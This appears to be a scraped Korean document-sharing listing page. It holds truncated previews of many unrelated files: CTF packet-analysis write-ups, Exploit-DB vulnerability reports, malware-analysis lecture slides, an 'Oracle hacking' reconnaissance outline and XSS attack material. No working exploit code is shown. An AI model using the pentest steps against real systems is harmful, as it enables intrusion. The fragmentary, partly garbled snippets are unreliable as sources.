Hackthepacket WriteUp ##DoubleB## LQ. telnet 은다보여 LEQ : telnet Hint : Key is telent Password FILE : 3.Q_2(Leopardan) Sol) Idea : 힌트에따라 TELNET 프로토콜을필터링 Hackthepacket WriteUp ##DoubleB## LQ. telnet 은다보여 LEQ : telnet Hint : Key is telent Password FILE : 3.Q_2(Leopardan) Idea : 힌트에따라 TELNET 프로토콜을필터링하여 FollowStream 을통해데이터흐름을본다. 3.Q_2(Leopardan).pcap 을와이어샤크로불러온다.

More information

Chapter 1

Chapter 1 3 Oracle 설치 Objectives Download Oracle 11g Release 2 Install Oracle 11g Release 2 Download Oracle SQL Developer 4.0.3 Install Oracle SQL Developer 4.0.3 Create a database connection 2 Download Oracle 11g

More information

76 XSS 하 Huge-IT Slider admin.php XSS

76 XSS 하 Huge-IT Slider admin.php XSS 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (05.06) 05.06.0~05.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 05 년 6 월에공개된 Exploit-DB 의분석결과, LFI 공격에대한보고개수가가장많았습니다. LFI 공격은대체적으로공격난이도는낮지만공격이성공했을경우시스템의주요파일들이노출되거나파일다운로드가가능해지기때문에위험도가높은공격으로분류됩니다.

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture3-2 Malware Analysis #3-2 Agenda 안드로이드악성코드분석 악성코드분석 안드로이드악성코드정적분석 APK 추출 #1 adb 명령 안드로이드에설치된패키지리스트추출 adb shell pm list packages v0nui-macbook-pro-2:lecture3 v0n$

More information

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum

API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Docum API STORE 키발급및 API 사용가이드 Document Information 문서명 : API STORE 언어별 Client 사용가이드작성자 : 작성일 : 2012.11.23 업무영역 : 버전 : 1 st Draft. 서브시스템 : 문서번호 : 단계 : Document Distribution Copy Number Name(Role, Title) Date

More information

제20회_해킹방지워크샵_(이재석)

제20회_해킹방지워크샵_(이재석) IoT DDoS DNS (jaeseog@sherpain.net) (www.sherpain.net) DDoS DNS DDoS / DDoS(Distributed DoS)? B Asia Broadband B Bots connect to a C&C to create an overlay network (botnet) C&C Provider JP Corp. Bye Bye!

More information

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-

EDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time- EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.

More information

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478>

<4D6963726F736F667420506F776572506F696E74202D2030342E20C0CEC5CDB3DD20C0C0BFEB20B9D720BCADBAF1BDBA20B1E2BCFA2831292E70707478> 웹과 인터넷 활용 및실습 () (Part I) 문양세 강원대학교 IT대학 컴퓨터과학전공 강의 내용 전자우편(e-mail) 인스턴트 메신저(instant messenger) FTP (file transfer protocol) WWW (world wide web) 인터넷 검색 홈네트워크 (home network) Web 2.0 개인 미니홈페이지 블로그 (blog)

More information

SRC PLUS 제어기 MANUAL

SRC PLUS 제어기 MANUAL ,,,, DE FIN E I N T R E A L L O C E N D SU B E N D S U B M O TIO

More information

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378>

<4D6963726F736F667420576F7264202D2033BFF920BECBBEE0BFF9B0A3BAB8B0EDBCAD2E646F6378> 목차 Part Ⅰ. 2 월의 악성코드 통계 1. 악성코드 통계... 2 (1) 감염 악성코드 Top 15... 2 (2) 카테고리별 악성코드 유형... 3 (3) 카테고리별 악성코드 비율 전월 비교... 3 (4) 월별 피해 신고 추이... 4 (5) 월별 악성코드 DB 등록 추이... 4 2. 악성코드 이슈 분석 악성코드 종합 선물셋트 Bredolab Worm...

More information

POC "Power of Community" 이민우 (lwmr)

POC Power of Community 이민우 (lwmr) POC2011 - "Power of Community" 이민우 (lwmr) pmskylove@gmail.com L_01 Q : 지성이는홈쇼핑을하다이상한페이지에접속하여악성코드에감염되었다! 악성스크립트에포함되어있는쉘코드가다운로드하는 URL 을찾아라! Twitter 의 2mart 라는힌트를보고 WireShark 의 File Export -> Objects -> HTTP

More information

Overall Process

Overall Process CSS ( ) Overall Process Overall Process (Contents : Story Board or Design Source) (Structure : extensible HyperText Markup Language) (Style : Cascade Style Sheet) (Script : Document Object Model) (Contents

More information

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj

EDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은

More information

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University

Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Network Security - Wired Sniffing 실습 ICNS Lab. Kyung Hee University Outline Network Network 구조 Source-to-Destination 간 packet 전달과정 Packet Capturing Packet Capture 의원리 Data Link Layer 의동작 Wired LAN Environment

More information

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일 Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae

More information

EDB 분석보고서 (05.0) ~ Exploit-DB( 에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL

EDB 분석보고서 (05.0) ~ Exploit-DB(  에공개된별로분류한정보입니다 SQL Injection 하 상 u5cms localize.php SQL U5cms 3607 SQL EDB 분석보고서 (05.0) 05.0.0~05.0.8 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 월에공개된 Exploit-DB 의분석결과, 지난 월의분석결과와동일하게 SQL Injection 과 Coss Site Scipting(XSS) 공격에대한보고개수가가장많았습니다.

More information

Secure Programming Lecture1 : Introduction

Secure Programming Lecture1 : Introduction Malware and Vulnerability Analysis Lecture4-1 Vulnerability Analysis #4-1 Agenda 웹취약점점검 웹사이트취약점점검 HTTP and Web Vulnerability HTTP Protocol 웹브라우저와웹서버사이에하이퍼텍스트 (Hyper Text) 문서송수신하는데사용하는프로토콜 Default Port

More information

DocsPin_Korean.pages

DocsPin_Korean.pages Unity Localize Script Service, Page 1 Unity Localize Script Service Introduction Application Game. Unity. Google Drive Unity.. Application Game. -? ( ) -? -?.. 준비사항 Google Drive. Google Drive.,.. - Google

More information

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2

FMX M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2 FMX FMX 20062 () wwwexellencom sales@exellencom () 1 FMX 1 11 5M JPG 15MB 320x240 30fps, 160Kbps 11MB View operation,, seek seek Random Access Average Read Sequential Read 12 FMX () 2 FMX FMX D E (one

More information

bn2019_2

bn2019_2 arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily

More information

6강.hwp

6강.hwp ----------------6강 정보통신과 인터넷(1)------------- **주요 키워드 ** (1) 인터넷 서비스 (2) 도메인네임, IP 주소 (3) 인터넷 익스플로러 (4) 정보검색 (5) 인터넷 용어 (1) 인터넷 서비스******************************* [08/4][08/2] 1. 다음 중 인터넷 서비스에 대한 설명으로

More information

Microsoft PowerPoint 통신 및 압축 명령어.ppt

Microsoft PowerPoint 통신 및 압축 명령어.ppt 컴퓨터특강 () 2006 년봄학기 문양세강원대학교컴퓨터과학과 PING 원격지컴퓨터의상태 (accessible 여부 ) 를확인 $ ping host-name // alive or dead check $ ping s host-name // packet 송수신확인 Page 2 1 TELNET (1/4) telnet 은원격지에있는상대방컴퓨터에자신의컴퓨터를접속하여,

More information

UDP Flooding Attack 공격과 방어

UDP Flooding Attack 공격과 방어 황 교 국 (fullc0de@gmail.com) SK Infosec Co., Inc MSS Biz. Security Center Table of Contents 1. 소개...3 2. 공격 관련 Protocols Overview...3 2.1. UDP Protocol...3 2.2. ICMP Protocol...4 3. UDP Flood Test Environment...5

More information

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu

EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(  에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다.

More information

untitled

untitled CAN BUS RS232 Line Ethernet CAN H/W FIFO RS232 FIFO IP ARP CAN S/W FIFO TERMINAL Emulator COMMAND Interpreter ICMP TCP UDP PROTOCOL Converter TELNET DHCP C2E SW1 CAN RS232 RJ45 Power

More information

Interstage5 SOAP서비스 설정 가이드

Interstage5 SOAP서비스 설정 가이드 Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service

More information

Subnet Address Internet Network G Network Network class B networ

Subnet Address Internet Network G Network Network class B networ Structure of TCP/IP Internet Internet gateway (router) Internet Address Class A Class B Class C 0 8 31 0 netid hostid 0 16 31 1 0 netid hostid 0 24 31 1 1 0 netid hostid Network Address : (A) 1 ~ 127,

More information

Network seminar.key

Network seminar.key Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network

More information

슬라이드 1

슬라이드 1 Pairwise Tool & Pairwise Test NuSRS 200511305 김성규 200511306 김성훈 200614164 김효석 200611124 유성배 200518036 곡진화 2 PICT Pairwise Tool - PICT Microsoft 의 Command-line 기반의 Free Software www.pairwise.org 에서다운로드후설치

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378>

<4D6963726F736F667420576F7264202D20B3BBBACEC7D8C5B7B4EBC8B820BAB8B0EDBCAD2E646F6378> HUST 내부해킹대회 보고서 Uprising 팀원: 이규현, 김정주, 장민석, 송진기 Network.1 문제 파일을 UltraEdit으로 열어보니 ip가 적혀있고 통신내용인 것 같은 내용들이 포함되어있어 Wireshark로 열어보니 패킷들이 캡쳐되어있었다. Wireshark에서 Follow TCP Stream을 이용해 통신 내용을 보는데 일부가 인코드된 Base64

More information

신종파밍악성코드분석 Bolaven

신종파밍악성코드분석 Bolaven 신종파밍악성코드분석 Bolaven 2013.06.27 개요 지난 1월볼라벤 6차문서에서진화한파밍기법 (= 호스트파일변조 ) 에대해분석및공유를하였다. 6차문서에서는웹을통하여악성코드가유포되는과정과파밍기법의전반적인흐름을알아보았다면, 이번문서에서는파밍기법에서사용되는악성파일의행위에대해중점적으로분석하였다. 파밍기법이란? PC 를악성코드에감염시켜정상홈페이지주소로접속하여도피싱사이트로

More information

MySQL-Ch10

MySQL-Ch10 10 Chapter.,,.,, MySQL. MySQL mysqld MySQL.,. MySQL. MySQL....,.,..,,.,. UNIX, MySQL. mysqladm mysqlgrp. MySQL 608 MySQL(2/e) Chapter 10 MySQL. 10.1 (,, ). UNIX MySQL, /usr/local/mysql/var, /usr/local/mysql/data,

More information

PowerPoint Presentation

PowerPoint Presentation FORENSICINSIGHT SEMINAR SQLite Recovery zurum herosdfrc@google.co.kr Contents 1. SQLite! 2. SQLite 구조 3. 레코드의삭제 4. 삭제된영역추적 5. 레코드복원기법 forensicinsight.org Page 2 / 22 SQLite! - What is.. - and why? forensicinsight.org

More information

T100MD+

T100MD+ User s Manual 100% ) ( x b a a + 1 RX+ TX+ DTR GND TX+ RX+ DTR GND RX+ TX+ DTR GND DSR RX+ TX+ DTR GND DSR [ DCE TYPE ] [ DCE TYPE ] RS232 Format Baud 1 T100MD+

More information

(SW3704) Gingerbread Source Build & Working Guide

(SW3704) Gingerbread Source Build & Working Guide (Mango-M32F4) Test Guide http://www.mangoboard.com/ http://cafe.naver.com/embeddedcrazyboys Crazy Embedded Laboratory www.mangoboard.com cafe.naver.com/embeddedcrazyboys CRZ Technology 1 Document History

More information

LXR 설치 및 사용법.doc

LXR 설치 및 사용법.doc Installation of LXR (Linux Cross-Reference) for Source Code Reference Code Reference LXR : 2002512( ), : 1/1 1 3 2 LXR 3 21 LXR 3 22 LXR 221 LXR 3 222 LXR 3 3 23 LXR lxrconf 4 24 241 httpdconf 6 242 htaccess

More information

Discrete Mathematics

Discrete Mathematics 컴퓨터특강 () 2005 년봄학기 문양세컴퓨터과학과강원대학교자연과학대학 PING 원격지컴퓨터의상태 (accessible 여부 ) 를확인 $ ping host-name // alive or dead check $ ping s host-name // packet 송수신확인 Page 2 TELNET (1/4) telnet 은원격지에있는상대방컴퓨터에자신의컴퓨터를접속하여,

More information

Microsoft PowerPoint - ch07.ppt

Microsoft PowerPoint - ch07.ppt chapter 07. 시스코라우터기본동작 한빛미디어 -1- 학습목표 시스코라우터외적, 내적구성요소 시스코라우터부팅단계 시스코라우터명령어모드 한빛미디어 -2- 시스코라우터구성요소 라우터외부구성요소 (1) [ 그림 ] 2600 라우터전면도 인터페이스카드 전원부 LED 라우터조건 한빛미디어 -3- 시스코라우터구성요소 라우터외부구성요소 (2) [ 그림 ] VTY 를이용한라우터접속

More information

법제코너 저자권의 이해 저작권의 의의 세계 각국은 보호의 정도에는 조금씩 차이가 있으나 일반적으 로 두 가지의 근거로서 저작권을 보호하고 있다. 하나는 저작권 을 창작자 개인의 인격적 경제적 권리로 인정하는 것이고 다른 하나는 지적 창작의 결과를 보호함으로써 사회적 경

법제코너 저자권의 이해 저작권의 의의 세계 각국은 보호의 정도에는 조금씩 차이가 있으나 일반적으 로 두 가지의 근거로서 저작권을 보호하고 있다. 하나는 저작권 을 창작자 개인의 인격적 경제적 권리로 인정하는 것이고 다른 하나는 지적 창작의 결과를 보호함으로써 사회적 경 저작권침해=범죄 인식확립 급선무 연재순서 1. 사이버스페이스의 정체 2. 사이버상의 음란 3. 사이버상의 명예훼손 4. 사이버상의 프라이버시 5. 사이버상의 저작권 6. 디지털콘텐츠의 유통과 관련된 법적 문제 초기 저작권(copyright)은 낱말 뜻 그대로 카피할 권리(right to copy), 즉 복사권을 의미했다. 그러나 IT의 발전과 더불어 방송 권,

More information

hd1300_k_v1r2_Final_.PDF

hd1300_k_v1r2_Final_.PDF Starter's Kit for HelloDevice 1300 Version 11 1 2 1 2 3 31 32 33 34 35 36 4 41 42 43 5 51 52 6 61 62 Appendix A (cross-over) IP 3 Starter's Kit for HelloDevice 1300 1 HelloDevice 1300 Starter's Kit HelloDevice

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó

ÀÎÅÍ³Ý ÁøÈï¿ø 3¿ù ÀúÇØ»ó Korea Internet & Security Agency 21 3 CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 31 34 35 1 213 Bot 1,85 1,32 16.7 1,53 1,76 12.1 222 317 3. 116 16 9.4% 345 23 5.% 267 233 14.6%

More information

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용

Oracle hacking 작성자 : 임동현 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Oracle hacking 작성자 : 임동현 (ddongsbrk@naver.com) 작성일 2008 년 10 월 11 일 ~ 2008 년 10 월 19 일 신규작성 작성내용 Skill List 1. Oracle For Pentest 1. Find TNS Listener (Default 1521 port) (with nmap or amap) 2. Get the

More information

Dropbox Forensics

Dropbox Forensics Cloud Storage Forensics Part I : Dropbox 2013. 09. 28 forensic.n0fate.com Dropbox Forensics Dropbox Forensics Dropbox 웹기반파일공유서비스 총 12 개의클라이언트지원 Desktop : Windows, Mac OS X, Linux Mobile : ios, Android,

More information

Intra_DW_Ch4.PDF

Intra_DW_Ch4.PDF The Intranet Data Warehouse Richard Tanler Ch4 : Online Analytic Processing: From Data To Information 2000. 4. 14 All rights reserved OLAP OLAP OLAP OLAP OLAP OLAP is a label, rather than a technology

More information

SMB_ICMP_UDP(huichang).PDF

SMB_ICMP_UDP(huichang).PDF SMB(Server Message Block) UDP(User Datagram Protocol) ICMP(Internet Control Message Protocol) SMB (Server Message Block) SMB? : Microsoft IBM, Intel,. Unix NFS. SMB client/server. Client server request

More information

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C

USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl C USB USB DV25 DV25 REC SRN-475S REC SRN-475S LAN POWER LAN POWER Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate

목차 BUG offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate ALTIBASE HDB 6.1.1.5.6 Patch Notes 목차 BUG-39240 offline replicator 에서유효하지않은로그를읽을경우비정상종료할수있다... 3 BUG-41443 각 partition 이서로다른 tablespace 를가지고, column type 이 CLOB 이며, 해당 table 을 truncate 한뒤, hash partition

More information

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad

36802 Tune Library / 중 NEX-Forms < admin-ajax.php 하 중 Ultimate Product Catalogue - / 하 중 Ultimate Product Catalogue - ad 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (205.04) 205.04.0~205.04.30 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 205 년 4 월에공개된 Exploit-DB 의분석결과, 공격에대한보고개수가가장많았습니다. 대부분의 공격이 CMS 에서발견되습니다. CMS 에서는

More information

슬라이드 1

슬라이드 1 Tadpole for DB 1. 도구개요 2. 설치및실행 4. 활용예제 1. 도구개요 도구명 소개 Tadpole for DB Tools (sites.google.com/site/tadpolefordb/) 웹기반의데이터베이스를관리하는도구 Database 스키마및데이터관리 라이선스 LGPL (Lesser General Public License) 특징 주요기능

More information

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (

PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS ( PWR PWR HDD HDD USB USB Quick Network Setup Guide xdsl/cable Modem PC DVR 1~3 1.. DVR DVR IP xdsl Cable xdsl Cable PC PC DDNS (http://ddns.hanwha-security.com) Step 1~5. Step, PC, DVR Step 1. Cable Step

More information

문서 템플릿

문서 템플릿 HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,

More information

C# Programming Guide - Types

C# Programming Guide - Types C# Programming Guide - Types 최도경 lifeisforu@wemade.com 이문서는 MSDN 의 Types 를요약하고보충한것입니다. http://msdn.microsoft.com/enus/library/ms173104(v=vs.100).aspx Types, Variables, and Values C# 은 type 에민감한언어이다. 모든

More information

TCP.IP.ppt

TCP.IP.ppt TCP/IP TCP/IP TCP/IP TCP/IP TCP/IP Internet Protocol _ IP Address Internet Protocol _ Subnet Mask Internet Protocol _ ARP(Address Resolution Protocol) Internet Protocol _ RARP(Reverse Address Resolution

More information

USER GUIDE

USER GUIDE Solution Package Volume II DATABASE MIGRATION 2010. 1. 9. U.Tu System 1 U.Tu System SeeMAGMA SYSTEM 차 례 1. INPUT & OUTPUT DATABASE LAYOUT...2 2. IPO 중 VB DATA DEFINE 자동작성...4 3. DATABASE UNLOAD...6 4.

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취

EDB 분석보고서 (06.07) ~ Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다 SQL Injection 하중 index.php SQL Injection 취 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) EDB 분석보고서 (06.07) 06.07.0~06.07.3 Exploit-DB(http://exploit-db.com) 에공개된취약점별로분류한정보입니다. 06 년 7 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting 공격에대한취약점보고개수가가장많았으며공격패턴도다양하게발견되었습니다.

More information

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks

XSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여

More information

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager

Data Sync Manager(DSM) Example Guide Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager Data Sync Manager (DSM) Example Guide DSM Copyright 2003 Ari System, Inc. All Rights reserved. Data Sync Manager are trademarks or registered trademarks of Ari System, Inc. 1 Table of Contents Chapter1

More information

3장

3장 C H A P T E R 03 CHAPTER 03 03-01 03-01-01 Win m1 f1 e4 e5 e6 o8 Mac m1 f1 s1.2 o8 Linux m1 f1 k3 o8 AJAX

More information

본 CERT) "Security Consumer Report - DLP" 는 한국침해사고대응팀협의회(CNCERT:CNsortium of 회원으로 활동하는 보안 담당자가 자발적으로 보고서 위원회를 구성한 후 국내에서 유 통되는 DLP 제품을 조사( 기획 수행 제작) 한

본 CERT) Security Consumer Report - DLP 는 한국침해사고대응팀협의회(CNCERT:CNsortium of 회원으로 활동하는 보안 담당자가 자발적으로 보고서 위원회를 구성한 후 국내에서 유 통되는 DLP 제품을 조사( 기획 수행 제작) 한 - DLP (Data Loss Prevention) - 2011. 11. ( 사) 한국침해사고대응팀협의회 - 1 - 본 CERT) "Security Consumer Report - DLP" 는 한국침해사고대응팀협의회(CNCERT:CNsortium of 회원으로 활동하는 보안 담당자가 자발적으로 보고서

More information

인켈(국문)pdf.pdf

인켈(국문)pdf.pdf M F - 2 5 0 Portable Digital Music Player FM PRESET STEREOMONO FM FM FM FM EQ PC Install Disc MP3/FM Program U S B P C Firmware Upgrade General Repeat Mode FM Band Sleep Time Power Off Time Resume Load

More information

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070>

<443A5C4C C4B48555C B3E25C32C7D0B1E25CBCB3B0E8C7C1B7CEC1A7C6AE425CBED0C3E0C7C1B7CEB1D7B7A55C D616E2E637070> #include "stdafx.h" #include "Huffman.h" 1 /* 비트의부분을뽑아내는함수 */ unsigned HF::bits(unsigned x, int k, int j) return (x >> k) & ~(~0

More information

목차 1. 개요... 3 2. USB 드라이버 설치 (FTDI DRIVER)... 4 2-1. FTDI DRIVER 실행파일... 4 2-2. USB 드라이버 확인방법... 5 3. DEVICE-PROGRAMMER 설치... 7 3-1. DEVICE-PROGRAMMER

목차 1. 개요... 3 2. USB 드라이버 설치 (FTDI DRIVER)... 4 2-1. FTDI DRIVER 실행파일... 4 2-2. USB 드라이버 확인방법... 5 3. DEVICE-PROGRAMMER 설치... 7 3-1. DEVICE-PROGRAMMER < Tool s Guide > 목차 1. 개요... 3 2. USB 드라이버 설치 (FTDI DRIVER)... 4 2-1. FTDI DRIVER 실행파일... 4 2-2. USB 드라이버 확인방법... 5 3. DEVICE-PROGRAMMER 설치... 7 3-1. DEVICE-PROGRAMMER 실행파일... 7 4. DEVICE-PROGRAMMER 사용하기...

More information

Microsoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx

Microsoft Word - Crackme 15 from Simples 문제 풀이_by JohnGang.docx CrackMe 15.exe (in Simples) 문제풀이 동명대학교정보보호동아리 THINK www.mainthink.net 강동현 Blog: johnghb.tistory.com e-mail: cari2052@gmail.com 1 목차 : 1. 문제설명및기본분석 --------------------------- P. 03 2 상세분석 ---------------------------

More information

초보자를 위한 분산 캐시 활용 전략

초보자를 위한 분산 캐시 활용 전략 초보자를위한분산캐시활용전략 강대명 charsyam@naver.com 우리가꿈꾸는서비스 우리가꿈꾸는서비스 우리가꿈꾸는서비스 우리가꿈꾸는서비스 그러나현실은? 서비스에필요한것은? 서비스에필요한것은? 핵심적인기능 서비스에필요한것은? 핵심적인기능 서비스에필요한것은? 핵심적인기능 서비스에필요한것은? 적절한기능 서비스안정성 트위터에매일고래만보이면? 트위터에매일고래만보이면?

More information

chapter4

chapter4 Basic Netw rk 1. ก ก ก 2. 3. ก ก 4. ก 2 1. 2. 3. 4. ก 5. ก 6. ก ก 7. ก 3 ก ก ก ก (Mainframe) ก ก ก ก (Terminal) ก ก ก ก ก ก ก ก 4 ก (Dumb Terminal) ก ก ก ก Mainframe ก CPU ก ก ก ก 5 ก ก ก ก ก ก ก ก ก ก

More information

MasoJava4_Dongbin.PDF

MasoJava4_Dongbin.PDF JSTORM http://wwwjstormpekr Issued by: < > Revision: Document Information Document title: Document file name: MasoJava4_Dongbindoc Revision number: Issued by: < > SI, dbin@handysoftcokr

More information

제목 레이아웃

제목 레이아웃 웹해킹이라고무시하는것들보소 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM SQL Injection 끝나지않은위협 2017.07.10 RUBIYA805[AT]GMAIL[DOT]COM Who am I 정도원 aka rubiya Penetration tester Web application bughuter Pwned 20+ wargame @kr_rubiya

More information

PowerPoint 프레젠테이션

